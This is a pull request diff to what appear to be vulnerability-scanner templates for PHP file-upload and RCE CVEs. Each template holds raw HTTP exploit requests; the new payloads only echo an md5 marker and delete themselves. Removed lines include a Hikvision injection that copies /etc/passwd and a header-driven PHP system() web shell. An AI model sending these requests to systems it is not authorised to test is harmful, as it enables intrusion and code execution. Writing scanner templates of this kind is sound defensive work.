### PR TITLE
updated php fileupload templates

### DIFF
--- a/http/cnvd/2021/CNVD-2021-49104.yaml
+++ b/http/cnvd/2021/CNVD-2021-49104.yaml
@@ -17,6 +17,9 @@ info:
     max-request: 2
   tags: cnvd2021,cnvd,pan,micro,fileupload,intrusive
 
+variables:
+  string: "{{randstr}}"
+
 http:
   - raw:
       - |
@@ -28,7 +31,7 @@ http:
         Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
         Content-Type: image/jpeg
 
-        <?php echo md5('CNVD-2021-49104');?>
+        <?php echo md5("{{string}}");?>
 
         --e64bdf16c554bbc109cecef6451c26a4--
       - |
@@ -37,6 +40,10 @@ http:
 
     matchers-condition: and
     matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(string)}}'
       - type: word
         part: body
         words:

--- a/http/cves/2012/CVE-2012-1823.yaml
+++ b/http/cves/2012/CVE-2012-1823.yaml
@@ -30,6 +30,9 @@ info:
     product: php
   tags: cve,cve2012,kev,vulhub,rce,php
 
+variables:
+  string: "CVE-2012-1823"
+
 http:
   - raw:
       - |
@@ -37,16 +40,13 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        <?php echo md5('CVE-2012-1823'); ?>
+        <?php echo md5("{{string}}");?>
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "3d638155445bffb044eec401381ad784"
+          - '{{md5(string)}}'
 
-      - type: status
-        status:
-          - 200
 # digest: 4b0a0048304602210092b10c72cc1fee8c04f5162308500dd81d910b697076b941eca0df0f5f7b7b96022100c296adc6a0e2ad0ebf4759128a19fb25b155493104267eeaa81f3731eea84fb2:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2017/CVE-2017-6090.yaml
+++ b/http/cves/2017/CVE-2017-6090.yaml
@@ -28,6 +28,9 @@ info:
     shodan-query: http.title:"PhpCollab"
   tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive
 
+variables:
+  string: "CVE-2017-6090"
+
 http:
   - raw:
       - |
@@ -39,7 +42,7 @@ http:
         Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
         Content-Type: application/x-php
 
-        <?php echo md5('phpcollab_rce');?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
 
         -----------------------------154934846911423734231554128137--
       - |
@@ -49,9 +52,9 @@ http:
     matchers-condition: and
     matchers:
       - type: word
-        part: body
+        part: body_2
         words:
-          - "48dbd2384cb6b996fa1e2855c7f0567f"
+          - '{{md5(string)}}'
 
       - type: status
         status:

--- a/http/cves/2017/CVE-2017-9841.yaml
+++ b/http/cves/2017/CVE-2017-9841.yaml
@@ -27,6 +27,9 @@ info:
     product: phpunit
   tags: cve2017,cve,php,phpunit,rce,kev,phpunit_project
 
+variables:
+  string: "CVE-2017-9841"
+
 http:
   - raw:
       - |
@@ -34,44 +37,44 @@ http:
         Host: {{Hostname}}
         Content-Type: text/html
 
-        <?php echo md5(phpunit_rce);?>
+        <?php echo md5("{{string}}");?>
       - |
         GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: text/html
 
-        <?php echo md5(phpunit_rce);?>
+        <?php echo md5("{{string}}");?>
       - |
         GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: text/html
 
-        <?php echo md5(phpunit_rce);?>
+        <?php echo md5("{{string}}");?>
       - |
         GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: text/html
 
-        <?php echo md5(phpunit_rce);?>
+        <?php echo md5("{{string}}");?>
       - |
         GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: text/html
 
-        <?php echo md5(phpunit_rce);?>
+        <?php echo md5("{{string}}");?>
       - |
         GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: text/html
 
-        <?php echo md5(phpunit_rce);?>
+        <?php echo md5("{{string}}");?>
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "6dd70f16549456495373a337e6708865"
+          - '{{md5(string)}}'
 
       - type: status
         status:

--- a/http/cves/2020/CVE-2020-28871.yaml
+++ b/http/cves/2020/CVE-2020-28871.yaml
@@ -29,6 +29,9 @@ info:
     product: monitorr
   tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project
 
+variables:
+  string: "CVE-2020-28871"
+
 http:
   - raw:
       - |
@@ -47,7 +50,7 @@ http:
         Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
         Content-Type: image/gif
 
-        GIF89a213213123<?php echo md5('CVE-2020-28871');unlink(__FILE__); ?>
+        GIF89a213213123<?php echo md5("{{string}}");unlink(__FILE__);?>
 
         -----------------------------31046105003900160576454225745--
       - |
@@ -59,7 +62,7 @@ http:
       - type: word
         part: body_2
         words:
-          - "d03c180355b797069cc047ff5606d689"
+          - '{{md5(string)}}'
 
       - type: status
         status:

--- a/http/cves/2021/CVE-2021-24145.yaml
+++ b/http/cves/2021/CVE-2021-24145.yaml
@@ -30,6 +30,9 @@ info:
     framework: wordpress
   tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus
 
+variables:
+  string: "CVE-2021-24145"
+
 http:
   - raw:
       - |
@@ -48,7 +51,7 @@ http:
         Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php"
         Content-Type: text/csv
 
-        <?php echo 'CVE-2021-24145'; ?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
 
         -----------------------------132370916641787807752589698875
         Content-Disposition: form-data; name="mec-ix-action"
@@ -61,10 +64,8 @@ http:
 
     matchers-condition: and
     matchers:
-      - type: dsl
-        dsl:
-          - contains(header_3, "text/html")
-          - status_code_3 == 200
-          - contains(body_3, 'CVE-2021-24145')
-        condition: and
+      - type: word
+        part: body_3
+        words:
+          - '{{md5(string)}}'
 # digest: 4b0a00483046022100a2bd2c8892466618dbe6b82f2a50a434408d50f09f53c604bad403b9e4edba02022100c35eb57fb6d3f1e2a67234e21bb4bc2c28dd4069d00727518ded026d6d633379:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2021/CVE-2021-24236.yaml
+++ b/http/cves/2021/CVE-2021-24236.yaml
@@ -1,4 +1,4 @@
-id: "CVE-2021-24236"
+id: CVE-2021-24236
 
 info:
   name: WordPress Imagements <=1.2.5 - Arbitrary File Upload
@@ -29,9 +29,11 @@ info:
     product: imagements
     framework: wordpress
   tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project
+
 variables:
   php: "{{to_lower('{{randstr}}')}}.php"
   post: "1"
+  string: "CVE-2021-24236"
 
 http:
   - raw:
@@ -68,7 +70,7 @@ http:
         Content-Disposition: form-data; name="image"; filename="{{php}}"
         Content-Type: image/jpeg
 
-        <?php echo 'CVE-2021-24236'; ?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
 
         ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
         Content-Disposition: form-data; name="submit"
@@ -91,5 +93,6 @@ http:
       - type: word
         part: body_2
         words:
-          - "CVE-2021-24236"
+          - '{{md5(string)}}'
+
 # digest: 490a00463044022044c39b76c1670bd3821e888a59c2fcc7c2bebcfb2b62512c46e5d5106b91756302202d835016944e0d0c1b7eb6a83ff6a8fd8d13145e32dd2ad9b570e45291d08ea8:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2021/CVE-2021-24284.yaml
+++ b/http/cves/2021/CVE-2021-24284.yaml
@@ -31,10 +31,12 @@ info:
     product: kaswara
     framework: wordpress
   tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project
+
 variables:
   zip_file: "{{to_lower(rand_text_alpha(6))}}"
   php_file: "{{to_lower(rand_text_alpha(2))}}.php"
-  php_cmd: "<?php phpinfo();?>"
+  string: "CVE-2021-24284"
+  php_cmd: "<?php echo md5('{{string}}');unlink(__FILE__);?>"
 
 http:
   - raw:
@@ -71,7 +73,7 @@ http:
       - type: word
         part: body_2
         words:
-          - "phpinfo()"
+          - '{{md5(string)}}'
 
       - type: status
         status:

--- a/http/cves/2021/CVE-2021-24499.yaml
+++ b/http/cves/2021/CVE-2021-24499.yaml
@@ -30,6 +30,9 @@ info:
     framework: wordpress
   tags: cve,cve2021,wpscan,packetstorm,rce,workreap,wordpress,wp-plugin,intrusive,wp,amentotech
 
+variables:
+  string: "CVE-2021-24499"
+
 http:
   - raw:
       - |
@@ -46,7 +49,7 @@ http:
         Content-Disposition: form-data; name="award_img"; filename="{{randstr}}.php"
         Content-Type: application/x-httpd-php
 
-        <?php echo md5("CVE-2021-24499"); ?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
         -----------------------------cd0dc6bdc00b1cf9--
       - |
         GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1
@@ -57,7 +60,7 @@ http:
       - type: word
         part: body
         words:
-          - "71abe5077dae2754c36d731cc1534d4d"
+          - '{{md5(string)}}'
 
       - type: status
         status:

--- a/http/cves/2021/CVE-2021-36260.yaml
+++ b/http/cves/2021/CVE-2021-36260.yaml
@@ -30,6 +30,9 @@ info:
     shodan-query: http.favicon.hash:999357577
   tags: cve2021,cve,hikvision,rce,iot,intrusive,kev
 
+variables:
+  string: "{{to_lower(rand_base(12))}}"
+
 http:
   - raw:
       - |
@@ -37,15 +40,15 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
-        <?xml version="1.0" encoding="UTF-8"?><language>$(cat /etc/passwd>webLib/x)</language>
+        <?xml version="1.0" encoding="UTF-8"?><language>$(echo {{string}}>webLib/x)</language>
       - |
         GET /x HTTP/1.1
         Host: {{Hostname}}
 
     matchers-condition: and
     matchers:
-      - type: regex
-        part: body
-        regex:
-          - "root:.*:0:0:"
+      - type: word
+        part: body_2
+        words:
+          - "{{string}}"
 # digest: 4a0a0047304502201b310c74c0ecade6660855e689efe3fa564362a2328cdf4ee738863363e0b7c7022100b519bac287cc3e8a6a3cd1187daf969b5f5baf0a2ec9be7adb3344e95561dfc2:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2021/CVE-2021-40870.yaml
+++ b/http/cves/2021/CVE-2021-40870.yaml
@@ -29,6 +29,9 @@ info:
     product: controller
   tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload
 
+variables:
+  string: "CVE-2021-40870"
+
 http:
   - raw:
       - |
@@ -36,7 +39,7 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5("CVE-2021-40870"); ?>
+        CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5("{{string}}");unlink(__FILE__);?>
       - |
         GET /v1/{{randstr}}.php HTTP/1.1
         Host: {{Hostname}}
@@ -45,8 +48,9 @@ http:
     matchers-condition: and
     matchers:
       - type: word
+        part: body_2
         words:
-          - '0d95513363fd69b9fee712f333293654'
+          - '{{md5(string)}}'
 
       - type: status
         status:

--- a/http/cves/2022/CVE-2022-1952.yaml
+++ b/http/cves/2022/CVE-2022-1952.yaml
@@ -32,6 +32,9 @@ info:
     framework: wordpress
   tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics
 
+variables:
+  string: "CVE-2022-1952"
+
 http:
   - raw:
       - |
@@ -56,7 +59,7 @@ http:
         Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
         Content-Type: application/octet-stream
 
-        <?php echo md5('CVE-2022-1952');?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
 
         --------------------------98efee55508c5059--
       - |
@@ -68,13 +71,10 @@ http:
         Host: {{Hostname}}
 
     matchers:
-      - type: dsl
-        dsl:
-          - contains(header_3, "text/html")
-          - status_code_3 == 200
-          - contains(body_1, 'success\":true')
-          - contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')
-        condition: and
+      - type: word
+        part: body_3
+        words:
+          - '{{md5(string)}}'
 
     extractors:
       - type: regex

--- a/http/cves/2022/CVE-2022-25487.yaml
+++ b/http/cves/2022/CVE-2022-25487.yaml
@@ -28,7 +28,10 @@ info:
     max-request: 2
     vendor: thedigitalcraft
     product: atomcms
-  tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft
+  tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft,fielupload
+
+variables:
+  string: "CVE-2022-25487"
 
 http:
   - raw:
@@ -46,7 +49,7 @@ http:
         Content-Type: image/jpeg
 
 
-        <?php echo md5('CVE-2022-25487');?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
         -----------------------------30623082103363803402542706041--
       - |
         GET /uploads/{{filename}} HTTP/1.1
@@ -57,16 +60,7 @@ http:
       - type: word
         part: body
         words:
-          - 7ee3686858eb89dd68ccf85f0ea03abe
-
-      - type: word
-        part: header
-        words:
-          - text/html
-
-      - type: status
-        status:
-          - 200
+          - '{{md5(string)}}'
 
     extractors:
       - type: regex

--- a/http/cves/2022/CVE-2022-3982.yaml
+++ b/http/cves/2022/CVE-2022-3982.yaml
@@ -30,6 +30,9 @@ info:
     framework: wordpress
   tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart
 
+variables:
+  string: "CVE-2022-3982"
+
 http:
   - raw:
       - |
@@ -64,7 +67,7 @@ http:
         Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
         Content-Type: application/octet-stream
 
-        <?php echo md5("CVE-2022-3982"); ?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
 
         --------------------------1cada150a8151a54--
       - |
@@ -72,12 +75,10 @@ http:
         Host: {{Hostname}}
 
     matchers:
-      - type: dsl
-        dsl:
-          - contains(header_3, "text/html")
-          - status_code_3 == 200
-          - contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')
-        condition: and
+      - type: word
+        part: body_3
+        words:
+          - '{{md5(string)}}'
 
     extractors:
       - type: regex

--- a/http/cves/2022/CVE-2022-4328.yaml
+++ b/http/cves/2022/CVE-2022-4328.yaml
@@ -25,7 +25,10 @@ info:
     vendor: najeebmedia
     product: woocommerce_checkout_field_manager
     framework: wordpress
-  tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia
+  tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia,fileupload
+
+variables:
+  string: "CVE-2022-4328"
 
 http:
   - raw:
@@ -38,7 +41,7 @@ http:
         Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
         Content-Type: application/octet-stream
 
-        <?php echo md5("CVE-2022-4328"); ?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
 
         --------------------------22728be7b3104597--
       - |
@@ -48,16 +51,8 @@ http:
     matchers-condition: and
     matchers:
       - type: word
-        part: body
+        part: body_2
         words:
-          - fe5df26ce4ca0056ffae8854469c282f
+          - '{{md5(string)}}'
 
-      - type: word
-        part: header
-        words:
-          - text/html
-
-      - type: status
-        status:
-          - 200
 # digest: 4b0a00483046022100f22baef697a8a8d3b9cd970350ff7726ecc8317f7519fc4fc7986bc3b90deb640221009b219b5e2ad6ff59b71ad028d818ae581463c01d52d7f535c7efac3e81d60bc5:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2023/CVE-2023-26469.yaml
+++ b/http/cves/2023/CVE-2023-26469.yaml
@@ -31,9 +31,9 @@ info:
     product: jorani
     shodan-query: http.favicon.hash:-2032163853
   tags: cve2023,cve,jorani,rce,packetstorm
+
 variables:
-  cmd: "id"
-  payload: "<?php if(isset($_SERVER['HTTP_{{header}}'])){system(base64_decode($_SERVER['HTTP_{{header}}']));} ?>"
+  payload: "<?php if(isset($_SERVER['HTTP_{{header}}'])){echo md5('CVE-2023-26469');unlink(__FILE__);} ?>"
   header: "{{to_upper(rand_base(12))}}"
 
 http:
@@ -51,14 +51,14 @@ http:
         GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1
         Host: {{Hostname}}
         X-REQUESTED-WITH: XMLHttpRequest
-        {{header}}: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}}
+        {{header}}: CVE-2023-26469
 
     matchers-condition: and
     matchers:
-      - type: regex
-        part: body_3
-        regex:
-          - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=([\d,]+)\(.*?\)'
+      - type: word
+        part: body
+        words:
+          - '7cca0844e81cd333152def045fe075c2'
 
       - type: status
         part: header_3

--- a/http/cves/2023/CVE-2023-2648.yaml
+++ b/http/cves/2023/CVE-2023-2648.yaml
@@ -33,6 +33,7 @@ info:
   tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive
 variables:
   file: '{{rand_base(5, "abc")}}'
+  string: "CVE-2023-2648"
 
 http:
   - raw:
@@ -46,7 +47,7 @@ http:
         Content-Disposition: form-data; name="Filedata"; filename="{{file}}.php."
         Content-Type: image/jpeg
 
-        <?php echo md5('CVE-2023-2648');?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
         ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
       - |
         POST /attachment/{{name}}/{{file}}.php  HTTP/1.1
@@ -57,7 +58,7 @@ http:
       - type: word
         part: body_2
         words:
-          - "747711c62dffae7dbf726d8241bd07fe"
+          - '{{md5(string)}}'
 
       - type: status
         part: body_2

--- a/http/cves/2023/CVE-2023-33440.yaml
+++ b/http/cves/2023/CVE-2023-33440.yaml
@@ -30,8 +30,10 @@ info:
     vendor: faculty_evaluation_system_project
     product: faculty_evaluation_system
   tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project
+
 variables:
   email: "{{randstr}}@{{rand_base(5)}}.com"
+  string: "CVE-2023-33440"
 
 http:
   - raw:
@@ -56,7 +58,7 @@ http:
         Content-Disposition: form-data; name="img"; filename="{{randstr}}.php"
         Content-Type: application/octet-stream
 
-        <?php echo md5('CVE-2023-33440'); ?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
         -----------------------------1037163726497
         Content-Disposition: form-data; name="email"
 

--- a/http/cves/2023/CVE-2023-35885.yaml
+++ b/http/cves/2023/CVE-2023-35885.yaml
@@ -30,11 +30,12 @@ info:
     vendor: mgt-commerce
     product: cloudpanel
     shodan-query: title:"Cloudpanel"
-  tags: cve2023,cve,cloudpanel,rce,instrusive,mgt-commerce
+  tags: cve2023,cve,cloudpanel,rce,intrusive,mgt-commerce,fileupload
+
 variables:
   session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY="
   str1: "{{rand_base(10)}}"
-  str2: "{{randstr}}"
+  string: "CVE-2023-35885"
 
 http:
   - raw:
@@ -55,7 +56,7 @@ http:
         Cookie: clp-fm={{session}}
         Content-Type: application/x-www-form-urlencoded
 
-        id=/htdocs/app/files/public/{{str1}}.php&content=<?php echo "{{str2}}"; ?>
+        id=/htdocs/app/files/public/{{str1}}.php&content=<?php echo md5("{{string}}");unlink(__FILE__);?>
       - |
         POST /file-manager/backend/permissions HTTP/1.1
         Host: {{Hostname}}
@@ -68,7 +69,8 @@ http:
         Host: {{Hostname}}
 
     matchers:
-      - type: dsl
-        dsl:
-          - body_5 == str2
+      - type: word
+        part: body_5
+        words:
+          - '{{md5(string)}}'
 # digest: 4a0a00473045022100a045e62170736a2a8aeec80f23c92eb2dfbb4704e093df2e6fa248efe9b5b13a02205561485b4abcd5c2e85f585adb82c3e1234a7a623a068b389b548de0887da802:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2023/CVE-2023-36844.yaml
+++ b/http/cves/2023/CVE-2023-36844.yaml
@@ -32,8 +32,8 @@ info:
     shodan-query: title:"Juniper Web Device Manager"
   tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev
 variables:
-  value: "CVE-2023-36844"
-  payload: "('<?php echo md5('{{value}}');?>')"
+  string: "CVE-2023-36844"
+  payload: "('<?php echo md5('{{string}}');unlink(__FILE__);?>')"
 
 http:
   - raw:
@@ -65,7 +65,7 @@ http:
       - type: word
         part: body_3
         words:
-          - '{{md5(value)}}'
+          - '{{md5(string)}}'
 
     extractors:
       - type: regex

--- a/http/cves/2023/CVE-2023-37629.yaml
+++ b/http/cves/2023/CVE-2023-37629.yaml
@@ -28,6 +28,9 @@ info:
     product: simple_online_piggery_management_system
   tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project
 
+variables:
+  string: "CVE-2023-37629"
+
 http:
   - raw:
       - |
@@ -67,7 +70,7 @@ http:
         Content-Disposition: form-data; name="pigphoto"; filename="{{rand_base(5)}}".php"
         Content-Type: application/x-php
 
-        <?php echo md5('CVE-2023-37629'); ?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
 
         -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
         Content-Disposition: form-data; name="submit"

--- a/http/cves/2023/CVE-2023-4596.yaml
+++ b/http/cves/2023/CVE-2023-4596.yaml
@@ -29,6 +29,9 @@ info:
     publicwww-query: /wp-content/plugins/Forminator
   tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub
 
+variables:
+  string: "CVE-2023-4596"
+
 http:
   - raw:
       - |
@@ -60,7 +63,7 @@ http:
         Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php"
         Content-Type: application/x-php
 
-        <?php echo md5('CVE-2023-4596');?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
         ------WebKitFormBoundaryBLOYSueQAdgN2PRe
         Content-Disposition: form-data; name="forminator_nonce"
 

--- a/http/cves/2023/CVE-2023-5360.yaml
+++ b/http/cves/2023/CVE-2023-5360.yaml
@@ -29,8 +29,10 @@ info:
     framework: wordpress
     publicwww-query: "/plugins/royal-elementor-addons/"
   tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive
+
 variables:
   file: "{{to_lower(rand_text_alpha(5))}}"
+  string: "CVE-2023-5360"
 
 http:
   - raw:
@@ -46,7 +48,7 @@ http:
         Content-Disposition: form-data; name="uploaded_file"; filename="{{file}}.ph$p"
         Content-Type: image/png
 
-        <?php echo md5("CVE-2023-5360");?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
         -----------------------------318949277012917151102295043236
         Content-Disposition: form-data; name="allowed_file_types"
 
@@ -69,17 +71,7 @@ http:
       - type: word
         part: body_3
         words:
-          - "86398d3a90432d24901a7bbdcf1ab2ba"
-        condition: and
-
-      - type: word
-        part: header_3
-        words:
-          - "text/html"
-
-      - type: status
-        status:
-          - 200
+          - '{{md5(string)}}'
 
     extractors:
       - type: regex

--- a/http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml
+++ b/http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml
@@ -14,6 +14,8 @@ info:
   metadata:
     max-request: 2
   tags: rce,fileupload,intrusive,cloud,chuangtian
+variables:
+  string: "core-chuangtian-cloud-rce"
 
 http:
   - raw:
@@ -29,17 +31,16 @@ http:
         Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
         Content-Type: image/avif
 
-        <?php echo md5("core-chuangtian-cloud"); ?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
         ------WebKitFormBoundaryfcKRltGv--
       - |
         GET /Upload/test/{{randstr}}.php HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
-      - type: dsl
-        dsl:
-          - 'contains(body_2, "f0a712e2bcf99c5b0c370b3a4286bb35")'
-          - 'status_code_2 == 200'
-        condition: and
+      - type: word
+        part: body_2
+        words:
+          - '{{md5(string)}}'
 
 # digest: 4a0a00473045022066f84a24609e8aff18468dae4751d89b3367da8fbc9482995f7e6a21e3ae3795022100d4a6ce892231c551e62bdf99206ef5fad32891d92eea97c3d5bfd5ff5afc21eb:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
+++ b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
@@ -12,10 +12,11 @@ info:
     verified: true
     max-request: 2
     fofa-query: app="Ruijie-NBR路由器"
-  tags: ruijie,file-upload,intrusive,nbr
+  tags: ruijie,fileupload,intrusive,nbr
+
 variables:
   filename: "{{rand_base(6)}}"
-  string: "{{rand_base(5)}}"
+  string: "ruijie-nbr-fileupload"
 
 http:
   - raw:
@@ -26,16 +27,15 @@ http:
         Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
         Content-Type: image/jpeg
 
-        <?php echo "{{string}}"; unlink(__FILE__); ?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
       - |
         GET /ddi/server/upload/{{filename}}.php HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
-      - type: dsl
-        dsl:
-          - status_code_1 == 200 && contains(body_1,"jsonrpc")
-          - status_code_2 == 200 && contains(body_2,"{{string}}")
-        condition: and
+      - type: word
+        part: body_2
+        words:
+          - '{{md5(string)}}'
 
 # digest: 4a0a0047304502205aec15506f551f025b3d99fd40a127b9e9c4787e16d32915d121b954cf089721022100d8fe6d2cbdf3db8ebc017eee812656570ec642c8ae99dea9b26c64c427570fee:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
+++ b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
@@ -16,8 +16,8 @@ info:
   tags: secgate,3600,firewall,file-upload,intrusive
 variables:
   filename: "{{rand_base(6)}}"
-  string: "{{randstr}}"
   file-upload: "{{rand_base(5)}}"
+  string: "secgate-3600-file-upload"
 
 http:
   - raw:
@@ -37,7 +37,7 @@ http:
         Content-Disposition: form-data; name="upfile"; filename="{{filename}}.php"
         Content-Type: text/plain
 
-        <?php echo "{{file-upload}}"; unlink(__FILE__); ?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
 
         ------WebKitFormBoundary{{string}}
         Content-Disposition: form-data; name="submit_post"
@@ -54,11 +54,9 @@ http:
 
     matchers-condition: and
     matchers:
-      - type: dsl
-        dsl:
-          - status_code_2 == 200
-          - contains(body_2,'{{file-upload}}')
-          - contains(header_2,'text/html')
-        condition: and
+      - type: word
+        part: body
+        words:
+          - '{{md5(string)}}'
 
 # digest: 490a00463044022000f7a446804d16688a2e6bd0ecb4c39abb59795da8559f0eff1c5c086fccd253022048085bb0719b371f98e0f447f501fa1b27dd721f6314c35ff9c42c22058b1d93:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml
+++ b/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml
@@ -15,21 +15,22 @@ info:
     max-request: 2
   tags: thinkcmf,rce,intrusive
 
+variables:
+  string: "thinkcmf-rce"
+
 http:
   - raw:
       - |
-        GET /index.php?a=fetch&content={{url_encode('<?php file_put_contents(\"{{randstr}}.php\",\"<?php echo phpinfo();\");')}} HTTP/1.1
+        GET /index.php?a=fetch&content={{url_encode('<?php file_put_contents(\"{{randstr}}.php\",\"<?php echo md5(\"{{string}}\");unlink(__FILE__);\");')}} HTTP/1.1
         Host: {{Hostname}}
       - |
         GET /{{randstr}}.php HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
-      - type: dsl
-        dsl:
-          - 'contains(body_2, "PHP Extension")'
-          - 'contains(body_2, "PHP Version")'
-          - 'status_code_2 == 200'
-        condition: and
+      - type: word
+        part: body_2
+        words:
+          - '{{md5(string)}}'
 
 # digest: 4a0a00473045022100e4c965a9409f38d7dbbfe18f1eb2a8ab388955797a2b6ce7c85402032084204a02204520eb20938068c12dc67cc4f6613dd1c37e0df4374c484a205713243a3f2cd1:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
+++ b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
@@ -14,8 +14,9 @@ info:
     max-request: 2
     fofa-query: app="TDXK-通达OA"
   tags: tongda,fileupload,intrusive,router
+
 variables:
-  num: "999999999"
+  string: "tongda-action-uploadfile"
 
 http:
   - raw:
@@ -44,7 +45,7 @@ http:
         Content-Disposition: form-data; name="ffff"; filename="test.php"
         Content-Type: application/octet-stream
 
-        <?php echo md5({{num}});unlink(__FILE__);?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
         ------WebKitFormBoundaryjhddzlqp
         Content-Disposition: form-data; name="mufile"
 
@@ -59,7 +60,7 @@ http:
       - type: word
         part: body_2
         words:
-          - '{{md5(num)}}'
+          - '{{md5(string)}}'
 
       - type: status
         status:
